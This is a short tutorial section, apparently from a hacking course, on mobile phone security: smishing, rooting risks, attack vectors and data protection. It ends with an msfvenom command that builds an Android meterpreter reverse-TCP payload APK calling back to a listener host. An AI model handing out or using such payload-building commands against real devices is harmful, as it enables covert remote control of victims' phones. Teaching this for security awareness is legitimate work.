# Section-11 Mobile phone security and hacking

> Mobile phones networks

- We use oue phones on a daily basis for a variety of reasons such as playing games, checking emails and staying in touch with our friends and family.

- Having a mobile phone means that you're connected to a network where others can contact you. Most phones are on the 4G network.

- When you are connected to a wireless phone network the device (also known as terminal) uses radio frequencies to communicate with the base station.
<br><br>

> Mobile phone OS

*There are two main operating systems for mobile devices:*

* **Android from Google** - Applications/games are install through google play or other methods of open distribution.

* **IOS from Apple** - Apple has its own operating system for mobile devices including iPhone, iPad, iPod. The official reposotory is the App store from apple. Those users that want to install applications outside the official repository will have to jailbreak their iPhone. This has to be considered a security breach because they will have to use an exploit to be able to install unofficial applications.

*Apple has been the leader in moblie security however according to a recent artical by Cnet, Android is gaining ground.*
<br><br>

> Social engineering w/Mobile phones

- Let's suppose you receive an SMS from an unknown number, it says that you have won a prize and in order to get it the only thing you need to do is reply to that SMS with your name, email account, or any other kind of personal information.

- If you were deceived by this message, now the person who send this SMS to you, knows not only that wireless phone number is active, he also knowns who you are, and any extra data you sent. Thousands of users reply to this kind of messege and different charges might apply to their mobile account.
<br><br>

> Common phone hacking methods

- Phishing - Luring your target with fake versions of legitimate sites to extract credentials.

- Control Messege Attacks - Involves sending a control messege on the device you want to hack. This allows you to get access to the settings menu of the target cell phone.

- SPAM Messeges - Mobile phone spam is a form of spam (unsolicited messages, especially advertising), directed at the text messaging or other communications services of mobile phones or smartphones. 
<br><br>

> Mobile attack vectors

**Mobile devices are just as vulnerable to attack as PCs are!**

*Some typical attack vectors includes:*
  - Mobile malware from a downloaded app.
  - Malvertisements inside of apps or on mobile sites.
  - OPerating system vulnerabilities.
  - Vulnerabilities of install apps.
  - Phishing via SMS with malicious links.
<br><br>

> Mobile malware

- Mobile malware is a growing issue and is prevalent primarily on Android but exists too on iPhone.

- Typically the malware comes from malicious apps that were downloaded from the app store and third-party app stores.

- Even through legitimate applications can potentially become compromised, be sure to only download trusted software from the app store that comes on your device by defult.
<br><br>

> Mobile hacking with URLs

- Similar to with PCs, mobile devices are commonly compromised through the use of malicious URLs.

- You may get a text from a random number saying something like "*Your payment was declined. Please click here and re-enter your payment information.*"

- This is typical with mobile phones and is reffered to as Smishing or SMS phishing.

- Avoid clicking any suspicious links via text you did not expect and come from odd numbers with on contact info.
<br><br>

> Jail breaking/Rooting

- Rooting or jail breaking allows you to do incredible things with your phone.

- You can highly customize your phone, try new ROMs, etc. but rooting has its own risks along with these new features.

- There two operations pretty much unlock your phone to the attacker and it also takes away secutiry features that were built into your OS and leaves you vulnerable.
<br><br>

> Phone data security

*Steps to protect you phone's data:*

  - Full device encryption
  - Using a password manager
<br><br>

> Phone hacking using malware

We will use metasploit to make a malware
```sh
msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1.13 LPORT=1234 -R > exploit.apk
```

